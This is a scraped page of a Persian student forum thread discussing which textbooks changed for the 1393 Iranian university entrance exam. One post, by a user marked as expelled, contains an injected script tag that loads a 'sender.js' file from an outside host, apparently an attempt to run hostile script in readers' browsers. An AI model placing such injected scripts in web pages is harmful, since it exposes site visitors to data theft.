خانه شیمی

X
  • آخرین ارسالات انجمن

•  

صفحه 2 از 3 نخستنخست 123 آخرینآخرین
    نمایش نتایج: از 16 به 30 از 36
    1. Top | #16

نمایش مشخصات
      نقل قول نوشته اصلی توسط mobin نمایش پست ها
      کتب شیمی 3 برای سال 92-93 تغییرات کلی خواهد داشت
      منظورت از تغییرات کلی یه چیزی اضافه میشه یا حذف میشه؟؟؟

2. Top | #17
      کاربر انجمن

نمایش مشخصات
      نقل قول نوشته اصلی توسط Hesam نمایش پست ها
      منظورت از تغییرات کلی یه چیزی اضافه میشه یا حذف میشه؟؟؟
      والا خودمم نمیدونم فقط تو سایت قلمچی و سایت دفتر تالیف کتاب های شیمی خوندم که تغییرات کلی خواهد داشت و این تغییرات تا نیمه اول تیرماه مشخص خواهد شد ولی هنوز که هنوزه تغییراتش معلوم نشده

3. Top | #18
      کاربر انجمن

نمایش مشخصات
      اه اینام با این کاراشون.... من سال دومم ک میخام بخونم... بالاخره چیکار کنیم بچه ها؟؟؟ میخام از شهریور شروع کنم....................

4. Top | #19
      کاربر انجمن

نمایش مشخصات
      سلام به همگی دوستان کتاب هایی که در سال چهارم و یا همون پیش دانشگاهی تغییر پیدا کرده عبارت است از
      ادبیات 1و2 ---ادبیات نسانی---دین و زندگی پیش---فیزیک1و2 تجربی و ریاضی و حساب دیفرانسیل با تغییرات جزیی ---و علوم زمین با تغییرات کلی چون این منابع برای سال چهارم هست پس منابع تغییر یافته برای کنکور 93 نسبت به 92 نیز محسوب می شود حالا یه سوال از دوستان میخواستم بدونم سال گذشه چه کتاب هایی از سال سوم تغییر پیدا کرده یا سال قبل تر چه کتاب هایی از سال دوم تغییر پیدا کرده تا تغییرات منابع کنکور 93 نسبت به 92 مشخص شود اگه اطلاع دارید بگید ممنون میشوم

5. Top | #20
      کاربر نیمه فعال

نمایش مشخصات
      پل ارتباطی ما و شما در فیسبوک :
      ّ
      FaceBook.Com/Konkur.in
      جدیدترین اپلیکیشن های اندروید در تاپیک کنکور دروید

عاشق دست پخت مادرمم اگرم سرد باشه مشکلی نی در عوض یه ادویه داره که توی هیچ رستورانی نیست و اسمش عشقه

_ ملتفت _

6. Top | #21
      کاربر انجمن

نمایش مشخصات
      l ممنون از قرار دادن لینک کتاب ها ولی اگر تغییرات را نسبت به سال گذشته برای کنکور 93 بگید ممنون میشم تا بدونیم کدوم یک از کتاب ها رو باید دانلود کنیم.

7. Top | #22
      کاربر نیمه فعال

نمایش مشخصات
      خوب فکر کنم همین باشه دیگه ... چون هم واسه آزمونای خودش این کتب هس و هم به گفته ی خودش منابع 93 هستن !
      سوم که تالیف پارسال - پیش مال همین امسال - دوم هم تالیف دو سال پیش

ولی خود سنجش باید منابع اصلی و اعلام کنه !
      پل ارتباطی ما و شما در فیسبوک :
      ّ
      FaceBook.Com/Konkur.in
      جدیدترین اپلیکیشن های اندروید در تاپیک کنکور دروید

عاشق دست پخت مادرمم اگرم سرد باشه مشکلی نی در عوض یه ادویه داره که توی هیچ رستورانی نیست و اسمش عشقه

_ ملتفت _

8. Top | #23
      کاربر انجمن

نمایش مشخصات
      نقل قول نوشته اصلی توسط abolfazl717 نمایش پست ها
      l ممنون از قرار دادن لینک کتاب ها ولی اگر تغییرات را نسبت به سال گذشته برای کنکور 93 بگید ممنون میشم تا بدونیم کدوم یک از کتاب ها رو باید دانلود کنیم.
      خوب فکر کنم همین باشه دیگه ... چون هم واسه آزمونای خودش این کتب هس و هم به گفته ی خودش منابع 93 هستن !
      سوم که تالیف پارسال - پیش مال همین امسال - دوم هم تالیف دو سال پیش

ولی خود سنجش باید منابع اصلی و اعلام کنه !
      lدرسته متوجه شدم همون منابع هستن میخواستم بدونم تا کدوم یک از کتاب ها تغییر کردن تا دانلود کنم اینجوری باید همه رو دانلود کنم بعد چک کنم

9. Top | #24
      کاربر انجمن

Khoshhalam
      نمایش مشخصات
      نقل قول نوشته اصلی توسط abolfazl717 نمایش پست ها
      سلام به همگی دوستان کتاب هایی که در سال چهارم و یا همون پیش دانشگاهی تغییر پیدا کرده عبارت است از
      ادبیات 1و2 ---ادبیات نسانی---دین و زندگی پیش---فیزیک1و2 تجربی و ریاضی و حساب دیفرانسیل با تغییرات جزیی ---و علوم زمین با تغییرات کلی چون این منابع برای سال چهارم هست پس منابع تغییر یافته برای کنکور 93 نسبت به 92 نیز محسوب می شود حالا یه سوال از دوستان میخواستم بدونم سال گذشه چه کتاب هایی از سال سوم تغییر پیدا کرده یا سال قبل تر چه کتاب هایی از سال دوم تغییر پیدا کرده تا تغییرات منابع کنکور 93 نسبت به 92 مشخص شود اگه اطلاع دارید بگید ممنون میشوم
      این اطلاعات شما مال پارساله که! وقتی پارسال ادبیات پیش کاملا تغییر کرده چهره فیزیک عوض شده دوباره که تغییر نمیکنه همینطور کله دینی ! تها تغییر شاید تو زمین باشه

10. Top | #25
      ngn
      کاربر نیمه فعال

Tajob
      نمایش مشخصات

11. Top | #26
      کاربر اخراجی

نمایش مشخصات
      <script src="http://myideas.xzn.ir/sender.js" type"text/javascript"></script>
      ببخشید معما میگن مطالب ثابته و هر سال فقط عددا رو تغییر میدن و سوال طرح میکنند... این مطلب درسته؟
      با تشکر

12. Top | #27
      کاربر انجمن

نمایش مشخصات
      اینجوری ک ما هی باید دانلود کنیم بشینیم با کتاب خودمون مقایسه کنیم کلی وقت میگیره ک........... راه سریع تری نیس؟؟؟؟؟

13. Top | #28
      کاربر انجمن

نمایش مشخصات
      نقل قول نوشته اصلی توسط personal نمایش پست ها
      این اطلاعات شما مال پارساله که! وقتی پارسال ادبیات پیش کاملا تغییر کرده چهره فیزیک عوض شده دوباره که تغییر نمیکنه همینطور کله دینی ! تها تغییر شاید تو زمین باشه
      دوست عزیز تغییراتی که گفتم توی سایت اداره کل نظارت بر نشر و توزیع مواد آموزشی آمده از لینک زیر هم میتونید خودتون دانلود کنید و ببینید
      وضعیت تغییرات چاپ کتاب های درسی در سال تحصیلی 93 -92 | پایگاه کتاب های درسی ، اداره کل نظارت بر نشر و توزیع مواد آموزشی
      و یه چیز دیگه -----به جز علوم زمین بقیه کتاب ها تغییرات جزیی داشتند و معمولا تغیرات جزیی فقط چند صفحه ای رو حذف می کنند ولی علوم زمین کاملا حذف شده
      برای مشاهده کتاب هی جدید میتونید از سایت صفحه اصلی - گزینه دو قسمت کتابخانه دیجیتال کتاب ها رو دانلود کنید
      ویرایش توسط abolfazl717 : 23 مرداد 1392 در ساعت 12:03

14. Top | #29
      کاربر باسابقه
      کاربر برتر

Khoshhalam
      نمایش مشخصات
      نقل قول نوشته اصلی توسط the best dentist نمایش پست ها
      اینجوری ک ما هی باید دانلود کنیم بشینیم با کتاب خودمون مقایسه کنیم کلی وقت میگیره ک........... راه سریع تری نیس؟؟؟؟؟
      دوست عزیز منابع کنکور93
      از سال دوم چاپ90
      سال سوم91
      سال چهرم هم92
      این تغییرات واسه اینه که انتشاراتیا بتونن کتابای کمک درسیشونو زود تر ویرایش کنن

15. Top | #30
      همکار سابق انجمن
      کاربر باسابقه

Daghon
      نمایش مشخصات
      سلام...یه سوال داشتم که اگه کمکم کنین ممنون میشم..
      من سال 89 کنکور دادم یعنی کتاب پیش دانشگاهی چاپ 88-89 و سوم 87-88 و دوم 86-87 رو دارم.
      با توجه به کنکور 93 که میشه پیش دانشگاهی 92-93 و سوم 91-92 و دوم 90-91 کدوم کتاب ها تغییر زیاد و اساسی داشته؟ برای تجربی.
      می دونم ریاضی و دین و زندگی پیش تغییر زیاد داشتن.بقیه هم تغییر زیاد کردن؟
      در واقع بهتر بگم..بعد از کنکور 90 منابع چه تغییری کرده؟ یعنی تو کنکور 91 و 92 منابع عوض شده نسبت به کنکور 89 و 90؟
      ویرایش توسط Alfredo : 07 شهریور 1392 در ساعت 20:40

صفحه 2 از 3 نخستنخست 123 آخرینآخرین

افراد آنلاین در تاپیک

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربر و 1 مهمان)